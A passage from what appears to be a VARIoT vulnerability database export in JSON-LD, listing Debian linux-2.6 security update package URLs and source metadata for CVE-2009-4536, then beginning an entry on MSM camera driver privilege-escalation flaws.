        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny2.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0306"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny3_mipsel.deb"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-41982"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4536"
      },
      {
        "db": "BID",
        "id": "37519"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001004"
      },
      {
        "db": "PACKETSTORM",
        "id": "86600"
      },
      {
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "db": "PACKETSTORM",
        "id": "101970"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-076"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4536"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-41982"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4536"
      },
      {
        "db": "BID",
        "id": "37519"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001004"
      },
      {
        "db": "PACKETSTORM",
        "id": "86600"
      },
      {
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "db": "PACKETSTORM",
        "id": "101970"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-076"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4536"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2010-01-12T00:00:00",
        "db": "VULHUB",
        "id": "VHN-41982"
      },
      {
        "date": "2010-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2009-4536"
      },
      {
        "date": "2009-12-29T00:00:00",
        "db": "BID",
        "id": "37519"
      },
      {
        "date": "2010-02-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001004"
      },
      {
        "date": "2010-02-24T00:55:37",
        "db": "PACKETSTORM",
        "id": "86600"
      },
      {
        "date": "2010-03-01T21:20:35",
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "date": "2010-02-05T16:17:54",
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "date": "2010-05-28T20:14:56",
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "date": "2011-06-03T16:16:00",
        "db": "PACKETSTORM",
        "id": "101970"
      },
      {
        "date": "2010-02-15T20:31:13",
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "date": "2009-12-29T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201001-076"
      },
      {
        "date": "2010-01-12T17:30:00.697000",
        "db": "NVD",
        "id": "CVE-2009-4536"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-11-16T00:00:00",
        "db": "VULHUB",
        "id": "VHN-41982"
      },
      {
        "date": "2018-11-16T00:00:00",
        "db": "VULMON",
        "id": "CVE-2009-4536"
      },
      {
        "date": "2015-05-07T17:01:00",
        "db": "BID",
        "id": "37519"
      },
      {
        "date": "2011-06-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001004"
      },
      {
        "date": "2010-01-12T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201001-076"
      },
      {
        "date": "2018-11-16T15:51:54.303000",
        "db": "NVD",
        "id": "CVE-2009-4536"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-076"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel of  e1000 Vulnerability in driver that bypasses packet filter restrictions",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001004"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "digital error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-076"
      }
    ],
    "trust": 0.6
  }
}

var-201401-0143
Vulnerability from variot

Multiple array index errors in drivers/media/video/msm/server/msm_cam_server.c in the MSM camera driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allow attackers to gain privileges by leveraging camera device-node access, related to the (1) msm_ctrl_cmd_done, (2) msm_ioctl_server, and (3) msm_server_send_ctrl functions. The Linux kernel is prone to a local privilege-escalation vulnerability. Local attackers can exploit this issue to gain elevated privileges on affected computers. Other attacks are also possible. Android for MSM is an Android MSM project, the main purpose of this project is to build an Android platform that includes Qualcomm MSM chipset

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
